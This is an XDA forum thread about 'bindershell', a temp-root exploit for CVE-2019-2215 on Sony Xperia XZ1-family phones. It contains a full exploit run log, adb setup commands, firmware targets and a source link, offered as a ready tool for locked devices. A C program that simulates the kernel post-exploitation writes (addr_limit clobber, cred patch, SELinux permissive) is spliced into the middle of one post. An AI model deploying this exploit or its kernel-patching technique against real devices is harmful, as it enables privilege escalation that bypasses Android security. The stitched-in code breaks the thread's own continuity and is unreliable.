[XZ1c/XZ1/XZp] temp root exploit via CVE-2019-2215 including magisk setup [Locked BL]


nlra

Senior Member
Sep 5, 2012
160
85
@jayloofah, unfortunately the method I am using is very dangerous, with real risk of bricking the phone, particularly those that cannot be unlocked with sony site unlock code. Also you cannot flash any custom rom as is. [...]

Hey @j4nn,

"Long time listener, first time caller." I appreciate your clear talents, and thank you for all that you have done for the Xperia community by applying those talents!

I also appreciate your reasons for keeping this exploit close to your chest...it's very responsible of you. Even so, these old phone platforms aren't getting any younger or more valuable as time passes -- all of the SD835-based Yoshino devices are either nearing (XZ1*) or past (XZP) the 4+ year mark now -- and Sony is very unlikely to release any further Yoshino updates at this point to close this loop; also, subsequent Xperia platforms based on newer Qualcomm SoCs have proven to be resistant to the exploit (at least without dire consequences, which provides a ready deterrent to most random Joes who might want to try it, assuming they even have the requisite skill to attempt it, which as you pointed out would require a carefully prepped and tested-in-advance custom kernel build from source at the very least!).

So with these devices nearing the end of their usable lifespan, it begs the question at what point would it no longer be considered irresponsible to at least document & disclose to the public exactly how the exploit works, especially since (arguably) the utility of these phone models as "out of date" products (by most -- perhaps wrong -- standards) would only increase in value as a result *if* this exploit were to escape the confines of your lab. Nobody is asking for you to implement, maintain, and support a dozen different easy-to-install versions of it for various ROMs...at least I'm not! 🙂 But I do think it would be a pity if the knowledge never got written down & disseminated, and instead just withered on the vine...

That said, if what you're primarily concerned about at this point is protecting it because you think Qualcomm SoCs with TrustZone might be vulnerable to it even up to the present day, and so letting it leak out would allow Qualcomm to close it on current and future products, then that is a bit more understandable...
 

gopal404

New member
May 28, 2016
1
0
temp root exploit for sony xperia XZ1c/XZ1/XZp with oreo firmware
by j4nn
https://j4nn.github.io/

Let me present you a temp root exploit for sony xperia XZ1 Compact / XZ1 / XZ Premium phones running android oreo firmware.
The exploit uses CVE-2019-2215, which can get you a temporary root shell very quickly and reliably (it's nearly instant).

SUPPORTED TARGETS
  • XZ1 Compact
    • G8441_47.1.A.8.49 (tested myself)
    • G8441_47.1.A.16.20 (tested myself)
  • XZ1
    • G8341_47.1.A.16.20
    • G8342_47.1.A.16.20
  • XZ Premium
    • G8141_47.1.A.16.20
    • G8142_47.1.A.16.20
with bindershell-v2 the following targets were added:
  • Xperia XZ1
    • G8343_47.1.A.12.150 (Freedom Canada)
    • G8343_47.1.A.12.205 (Freedom Canada)
    • SO-01K_47.1.F.1.105 (Docomo Japan)
    • SOV36_47.1.C.9.106 (AU Japan)
  • Xperia XZ1 Compact
    • SO-02K_47.1.F.1.105 (Docomo Japan)
  • XZ Premium
    • SO-04J_47.1.F.1.105 (Docomo Japan)
with bindershell-v2x the following target was added:
  • Xperia XZ1
    • 701SO_47.1.D.11.32 (Softbank Japan)
This is an alternative method to my renoroot exploit released before, to get a temp root shell for TA (drm keys) backup.

I've also implemented a script to start up magisk from the temp root shell, so this can be used nicely with still locked phones to enable magisk root without unlocking bootloader with the latest oreo fw. You still cannot modify anything in /system or /vendor partitions due to dm-verity, but you could use it for other useful stuff, like iptables based firewall for example.

Listed firmware versions may be found for example here:
https://www.xperiasite.pl/forum/221-firmware/
https://boycracked.com/?s=xperia+xz1

USAGE HOWTO
  • to get a simple temp root shell
    just download bindershell.zip, unzip, 'adb push bindershell /data/local/tmp' and get temp root:
    Code:
    G8441:/ $ cd /data/local/tmp
    G8441:/data/local/tmp $ chmod 755 ./bindershell
    G8441:/data/local/tmp $ ./bindershell
    
    bindershell - temp root shell for xperia XZ1c/XZ1/XZp using CVE-2019-2215
    https://github.com/j4nn/renoshell/tree/CVE-2019-2215
    
    MAIN: starting exploit for devices with waitqueue at 0x98
    PARENT: Reading leaked data
    PARENT: leaking successful
    MAIN: thread_info should be in stack
    MAIN: parsing kernel stack to find thread_info
    PARENT: Reading leaked data
    PARENT: Reading extra leaked data
    PARENT: leaking successful
    MAIN: task_struct_ptr = ffffffecc9691b00
    MAIN: thread_info_ptr = ffffffecc4c34000
    MAIN: Clobbering addr_limit
    MAIN: should have stable kernel R/W now
    kaslr slide 0x1d35200000
    selinux set to permissive
    current task credentials patched
    
    got root, start shell...
    
    G8441:/data/local/tmp #
  • for temp root with magisk setup
    do as in previous option and download also the magisk-setup-from-exploit.zip and Magisk-v19.3-Manager-v7.1.2.zip, unzip both and use following commands in addition (skip starting the bindershell in previous section):
    Code:
    adb install MagiskManager-v7.1.2.apk
    adb push Magisk-v19.3 /data/local/tmp
    adb shell 'cd /data/local/tmp/Magisk-v19.3 ; chmod 755 * ; /system/bin/sh ./update-binary -x ; ./magiskinit -x magisk magisk'
    adb push magisk-setup.sh /data/local/tmp
    adb shell chmod 755 /data/local/tmp/magisk-setup.sh
    (these commands are also present in the included magisk-push.sh script, which you can simply execute in linux, or possibly rename to a .bat file and execute in windows too /not tested though/)
    The above would copy the needed stuff to your phone.
    Then after each boot you can use following command to startup magisk via the exploit:
    Code:
    adb shell 'cd /data/local/tmp ; ./bindershell -c ./magisk-setup.sh'
  • see post#41 for a possibility to start this exploit again after reboot without use of adb, thanks to @Tifs


SOURCES
Source code for the exploit (bindershell) is available here:
https://github.com/j4nn/renoshell/tree/CVE-2019-2215

Magisk startup script is obviously already in source form inside the magisk-setup-from-exploit.zip archive attached.

Magisk binaries packed in the Magisk-v19.3-Manager-v7.1.2.zip are the unmodified upstream releases of Magisk-v19.3.zip and MagiskManager-v7.1.2.apk; only the needed components were extracted and combined into a single archive.
It might be possible to use other versions (v19.3+), but that has not been tested and is not supported in any way.

CREDITS
thanks to @arpruss for the su98 exploit variant (where the binder_thread wait queue is at offset 0x98 instead of 0xa0, which needed a completely different approach than the original exploit) - the core of the exploit up to the kernel space r/w primitives has been used

DOWNLOAD
Does it work for XZ1 47.1.A.12.205?
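The bindershell log quoted above ends with the three steps that follow once the binder bug has yielded a kernel read/write primitive: "Clobbering addr_limit", "current task credentials patched" and "selinux set to permissive". The C program below is an added illustration of that post-primitive stage and is not code from j4nn's repository; it replays the three writes against a user-space buffer that stands in for kernel memory. The struct layouts, field offsets, fake kernel addresses and the `kread`/`kwrite` helpers are all simplified assumptions made up for the example (the real offsets come from each firmware's kernel build, which is why the OP lists per-firmware targets).

```c
/* Added illustration (not j4nn's code) of the post-primitive stage of a kernel exploit:
 * addr_limit clobber, cred patch and SELinux permissive, replayed against a user-space
 * buffer standing in for kernel memory.  Layouts, offsets and addresses are made up. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

struct fake_cred {                      /* cut-down struct cred */
    uint32_t usage;
    uint32_t uid, gid, suid, sgid, euid, egid, fsuid, fsgid;   /* 8 contiguous ids */
    uint32_t securebits;
    uint64_t cap_inheritable, cap_permitted, cap_effective, cap_bset, cap_ambient;
};
struct fake_task_struct {               /* cut-down task_struct */
    uint64_t stack;                     /* kernel stack base; thread_info sits at its bottom */
    uint64_t real_cred, cred;           /* both point at the same cred for an unprivileged task */
};
struct fake_thread_info {
    uint64_t flags;
    uint64_t addr_limit;                /* USER_DS normally; KERNEL_DS lets copy_*_user reach kernel memory */
};

#define USER_DS   0x0000007fffffffffULL /* illustrative user-space limit */
#define KERNEL_DS 0xffffffffffffffffULL
#define CAP_ALL   0x0000003fffffffffULL /* 38 capability bits, CAP_LAST_CAP == 37 */
#define KBASE     0xffffffc000000000ULL /* made-up kernel virtual address of the fake memory */

static uint8_t kmem[64 * 1024];         /* 64 KiB of pretend kernel memory */
static const uint64_t TASK_ADDR = KBASE + 0x1000, CRED_ADDR = KBASE + 0x2000,
                      TI_ADDR = KBASE + 0x3000, ENFORCING_ADDR = KBASE + 0x4000;

static void *kptr(uint64_t kaddr, size_t len) {
    if (kaddr < KBASE || len > sizeof kmem || kaddr - KBASE > sizeof kmem - len) return NULL;
    return kmem + (kaddr - KBASE);
}
/* The arbitrary read/write primitives an exploit ends up with (memcpy here). */
static bool kread(uint64_t kaddr, void *dst, size_t len) {
    void *p = kptr(kaddr, len); if (!p) return false; memcpy(dst, p, len); return true;
}
static bool kwrite(uint64_t kaddr, const void *src, size_t len) {
    void *p = kptr(kaddr, len); if (!p) return false; memcpy(p, src, len); return true;
}
static bool kread64(uint64_t a, uint64_t *v) { return kread(a, v, sizeof *v); }
static bool kwrite64(uint64_t a, uint64_t v) { return kwrite(a, &v, sizeof v); }

/* Stage 1: raise addr_limit so the kernel's own user-copy routines become a stable R/W. */
static bool clobber_addr_limit(uint64_t thread_info) {
    return kwrite64(thread_info + offsetof(struct fake_thread_info, addr_limit), KERNEL_DS);
}
/* Stage 2: zero every id and fill every capability set of the current task's cred. */
static bool patch_creds(uint64_t task) {
    uint64_t cred;
    uint32_t ids[8] = {0};
    uint64_t caps[5] = {CAP_ALL, CAP_ALL, CAP_ALL, CAP_ALL, CAP_ALL};
    if (!kread64(task + offsetof(struct fake_task_struct, cred), &cred)) return false;
    return kwrite(cred + offsetof(struct fake_cred, uid), ids, sizeof ids) &&
           kwrite(cred + offsetof(struct fake_cred, cap_inheritable), caps, sizeof caps);
}
/* Stage 3: clear the global selinux_enforcing flag (a plain int in these kernels). */
static bool set_selinux_permissive(uint64_t enforcing_addr) {
    uint32_t zero = 0;
    return kwrite(enforcing_addr, &zero, sizeof zero);
}

/* Constructed starting state: an app-uid task, USER_DS limit, SELinux enforcing. */
static void setup_unprivileged_task(void) {
    struct fake_cred c = { .usage = 1, .uid = 2000, .gid = 2000, .suid = 2000, .sgid = 2000,
                           .euid = 2000, .egid = 2000, .fsuid = 2000, .fsgid = 2000, .cap_bset = CAP_ALL };
    struct fake_task_struct t = { .stack = TI_ADDR, .real_cred = CRED_ADDR, .cred = CRED_ADDR };
    struct fake_thread_info ti = { .flags = 0, .addr_limit = USER_DS };
    uint32_t enforcing = 1;
    memset(kmem, 0, sizeof kmem);
    kwrite(CRED_ADDR, &c, sizeof c); kwrite(TASK_ADDR, &t, sizeof t);
    kwrite(TI_ADDR, &ti, sizeof ti); kwrite(ENFORCING_ADDR, &enforcing, sizeof enforcing);
}

struct outcome { uint32_t uid_before, uid, euid, enforcing; uint64_t cap_effective, addr_limit; };

/* Run the three stages on the constructed task and read back what changed. */
static struct outcome run_post_exploit_stage(void) {
    struct outcome o = {0};
    uint64_t ti = 0, cred = 0;
    setup_unprivileged_task();
    kread64(TASK_ADDR + offsetof(struct fake_task_struct, cred), &cred);
    kread64(TASK_ADDR + offsetof(struct fake_task_struct, stack), &ti);   /* thread_info via task->stack */
    kread(cred + offsetof(struct fake_cred, uid), &o.uid_before, sizeof o.uid_before);
    clobber_addr_limit(ti);
    patch_creds(TASK_ADDR);
    set_selinux_permissive(ENFORCING_ADDR);
    kread(cred + offsetof(struct fake_cred, uid), &o.uid, sizeof o.uid);
    kread(cred + offsetof(struct fake_cred, euid), &o.euid, sizeof o.euid);
    kread64(cred + offsetof(struct fake_cred, cap_effective), &o.cap_effective);
    kread64(ti + offsetof(struct fake_thread_info, addr_limit), &o.addr_limit);
    kread(ENFORCING_ADDR, &o.enforcing, sizeof o.enforcing);
    return o;
}
```

On the real 4.4 arm64 kernels of these phones thread_info lives at the bottom of the task's kernel stack, which is why the log parses the leaked kernel stack to locate it before the addr_limit write; the order matters because the first write is what turns a fragile leak into the stable read/write that the cred and selinux_enforcing writes rely on. The example deliberately stops at a temp root: nothing here survives a reboot, matching the thread's repeated point that the exploit has to be re-run after every boot.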
 

skypiece

New member
Feb 23, 2012
1
3
Moscow
skypiece.narod.ru
Thanks for all the good advice above!
My job's banking applications do not like permanent root (stupid security). So I must use unsecured Android 8 (Oreo) with many limitations and breaches (instead of a secured modern OS with permanent root) because we have a temp root solution.

I have updated and automated all necessary things. Bindershell v2x and the official Magisk v23.0 binaries work better than v19.3 (root is not lost after clearing the Manager app from RAM). SafetyNet is working too.
0. You need to be familiar with ADB on Windows; connect the phone.
1. Unpack the attached archive to some folder
2. Run Magisk-v23.0-push.cmd (or port the simple commands to a unix-like shell) and enjoy this magic

After rebooting your phone, at any time root is needed, just run /sdcard/magisk-activate.sh with SManager and root will be back without using ADB.

p.s. tested on XZ1 Dual G8342 47.1.A.16.20 with locked bootloader
 

Attachments

  • temp-root-Magisk-v23.0.zip
    7.6 MB · Views: 166
  • Screenshot_20220117-230727.png
    Screenshot_20220117-230727.png
    56.3 KB · Views: 41

Sumomaus

New member
Jan 17, 2022
2
2
Berlin
Thanks for your work j4nn!

First of all, excuse my bad english, please.

I read a lot in the xda. Especially the sony-forums.

I've got a problem with one of my G8441s. The first G8441 I exploited with renoshell. Everything is fine. With the second G8441 I tried the new method with bindershell. Everything worked until pushing the TA back to the phone.

I flashed the fw G8441_47.1.A.8.49 with newflasher, then I got a temp root shell with bindershell. Saved the TA. Unlocked the phone, got a root shell, pushed the TA back. No error messages.
Then I rebooted, but the phone didn't start.
A hard reset didn't work. The notification light flashes green during that.
If I connect it to the PC, it goes into flash mode. So I can flash the fw G8441_47.1.A.8.49 with newflasher again. But after that, reboot isn't possible.

What did I do wrong?
 

j4nn

Senior Member
Jan 4, 2012
1,286
2,505
@Sumomaus, I am sorry, I have no idea what might have gone wrong there, except that the ta partition got corrupted for some reason?
But if it boots to flash mode, you may try to run newflasher in an empty directory to get the phone information logged - there you may see if everything returned is valid or not.
Can it be forced to boot into fastboot mode? And then boot twrp from usb?
 

Pocoio

New member
Jan 29, 2022
1
0
Hi, I proceeded flawlessly, gaining root access with magisk, confirmed with a few apps, but after removing the USB cable, a few minutes later no root exists anymore. What am I missing? (running the docomo version with your specific build number)
 

rizky_ykg

Member
Jun 1, 2022
7
2
Thanks to you, I put magisk on oem and no more temp root from the PC again

#tested on XZ1 Softbank
*here I added Magisk on sdcard
 

Attachments

  • IMG_20220601_165411.JPG
    IMG_20220601_165411.JPG
    34.8 KB · Views: 125
  • Magisk-v23.0_oem.zip
    7.4 MB · Views: 90
  • Magisk-v23.0-on_sdcard.zip
    2.7 MB · Views: 79

rizky_ykg

Member
Jun 1, 2022
7
2
*here magisk v25.1
-can't enable zygisk, I don't know how to do this on temp root
-can't hide the magisk app like on v24.xx and below
-but the modules work normally
 

Attachments

  • Magisk-v25.1_sdcard.zip
    3.7 MB · Views: 36
  • Screenshot_20220719-131649.png
    Screenshot_20220719-131649.png
    147.7 KB · Views: 46
  • downgrade.sh
    241 bytes · Views: 27

asseforlife

Member
May 16, 2016
42
8
Thanks for all the good advice above!
My job's banking applications do not like permanent root (stupid security). So I must use unsecured Android 8 (Oreo) with many limitations and breaches (instead of a secured modern OS with permanent root) because we have a temp root solution.

I have updated and automated all necessary things. Bindershell v2x and the official Magisk v23.0 binaries work better than v19.3 (root is not lost after clearing the Manager app from RAM). SafetyNet is working too.
0. You need to be familiar with ADB on Windows; connect the phone.
1. Unpack the attached archive to some folder
2. Run Magisk-v23.0-push.cmd (or port the simple commands to a unix-like shell) and enjoy this magic

After rebooting your phone, at any time root is needed, just run /sdcard/magisk-activate.sh with SManager and root will be back without using ADB.

p.s. tested on XZ1 Dual G8342 47.1.A.16.20 with locked bootloader

EDIT: it works, but after reboot, when the script starts, it says "no daemon is running"
 

j4nn

Senior Member
Jan 4, 2012
1,286
2,505
@eparr thank you for the donation!
I guess it was not necessary particularly when considering your guide post...
I see that as very useful possibly for many others - thank you!
 

Nik¹

Member
Dec 12, 2022
8
0
@j4nn hi,
I have sony xperia xz1 docomo SO-01K. I want to temproot but failed because the bindershell targeted version is SO-01K_47.1.F.1.105 but mine is SO-01K_47.1.B.0.542. Can anyone help me to temproot? Please help me🙏😔
 

j4nn

Senior Member
Jan 4, 2012
1,286
2,505
Anybody, can you please share with me the TA partition of your SO-02K (or the fake G8441 which is in fact an SO-02K)?
I am on the verge of enabling LTE band 20 on my SO-02K, but I need to compare several TA partitions of that model in order to identify the ta units that are device specific vs those that are identical within the SO-02K model range.
 

nitrams

Member
May 12, 2020
41
5
Anybody, can you please share with me the TA partition of your SO-02K (or the fake G8441 which is in fact an SO-02K)?
I am on the verge of enabling LTE band 20 on my SO-02K, but I need to compare several TA partitions of that model in order to identify the ta units that are device specific vs those that are identical within the SO-02K model range.
I only have an SOV36, if that could help. I also hope you can help me enable VoLTE on my XZ1. The network I'm using only became operational in 2021, so I think the modem configuration (.mbn) is not present in any ROM, either stock AU or global. I did some research and found out that other people were able to use VoLTE on the same network but on different phones, and some of those need root. I have tried your temp root, but knowing its limitations I'm not sure if I can make it work with it. I have an Xperia 5 AU with working VoLTE on the same network and I'm wondering if it's possible to port the modem config to the XZ1, though I'm still unsure whether it will work since they have different chipsets. Given that the XZ1 AU has BL unlock: no, there is not much for me to try. Although I've seen some posts that even Japan units can be turned to BL unlock: yes through the S1 unlock tool, that also needs paying for a one-time-use account. I've also seen some posts about the QPST tool to enable VoLTE and probably update the modem config files, but I think the phone needs to be rooted. My gut tells me that it is possible, I just don't know how. Or maybe I'm just wrong and this research of mine just gave me false hopes lol 😂. Anyway, I would really appreciate it if you looked into this, and I'm willing to participate in testing if needed. Btw, the network I'm using is DITO Telecom, whose parent company is China Telecom. We very much appreciate your work and contributions. Sending thanks from the Philippines 😊
 

Top Liked Posts

    7
    Thanks @j4nn for your effort.
    Now, all the years I've spent with stock Android 8, denying any attempt to upgrade, make sense :)
    Finally, I own the f**d phone, not the opposite.
    Even though there is no write access to /system and /vendor, it's possible to access all applications data directly, and control the system. It's not hard to apply the changes every time after reboot.

    By the way, I found that adb shell is not necessary to root the phone after reboot. It's possible to setup proper SELinux context on /data/local/tmp/bindershell from root shell:
    Code:
    G8441:/data/local/tmp # chcon u:object_r:system_file:s0 ./bindershell
    And after that, you can reboot and launch
    Code:
    G8441:/ $ /data/local/tmp/bindershell
    ...
    got root, start shell
    G8441:/ #
    from your favorite Terminal app inside the phone on the go, there's no need for PC and adb.
    I guess it's possible to setup Magisk that way too, or even create an app with desktop icon to automate this. So you will only need to click it once after reboot.
    6
    Actually you can remove bloatware permanently, but without gaining any storage space.
    It is possible to do that via oem partition - there you can make modifications, dm-verity does not check oem partition.
    It is possible to define which applications would be "removed", then even factory reset would not enable them again.
    This way of bloatware removal is quite tricky, as you may need to test factory reset to see if the phone boots or not.
    Such debloating can be done via early_config.xml in oem partition - there you can permanently blacklist apps with entries like this:
    Code:
       <string-array name="config_packagesBlacklist">
          <item>com.amazon.mShop.android.shopping</item>
       </string-array>
       <string-array name="config_packagesFullBlacklist">
          <item>com.amazon.mShop.android.shopping</item>
       </string-array>
    5
    temp root for new targets available with bindershell-v2 - following targets added:
    • Xperia XZ1
      • G8343_47.1.A.12.150 (Freedom Canada)
      • G8343_47.1.A.12.205 (Freedom Canada)
      • SO-01K_47.1.F.1.105 (Docomo Japan)
      • SOV36_47.1.C.9.106 (AU Japan)
    • Xperia XZ1 Compact
      • SO-02K_47.1.F.1.105 (Docomo Japan)
    • XZ Premium
      • SO-04J_47.1.F.1.105 (Docomo Japan)
    (offsets extracted from kernels from fully downloaded firmwares)
    5
    @p@to, it's only a temp root. Once you power off / reboot, it is not rooted anymore, you would need to start the exploit again - just the last command starting magisk. Using magisk modules might work or not, it depends - magisk is used in a way here that it has not been designed in (normally it should be started from kernel's ramdisk before the original init).
    You need to unlock and restore ta backup in order to get possibilities like custom kernels or full roms, pie or whatever...
    The only permanent customizations may be done in the oem partition. You could tune the blacklisted apps there in an oem version from the pie firmware to prepare it for the pie upgrade and then manually flash the rest of the pie fw skipping oem, to keep the modded/debloated setup in oem while running pie with a still locked BL, obviously without root.
    Or stick with the exploitable fw version (latest oreo) to be able to startup magisk after each boot, if you cannot unlock your BL.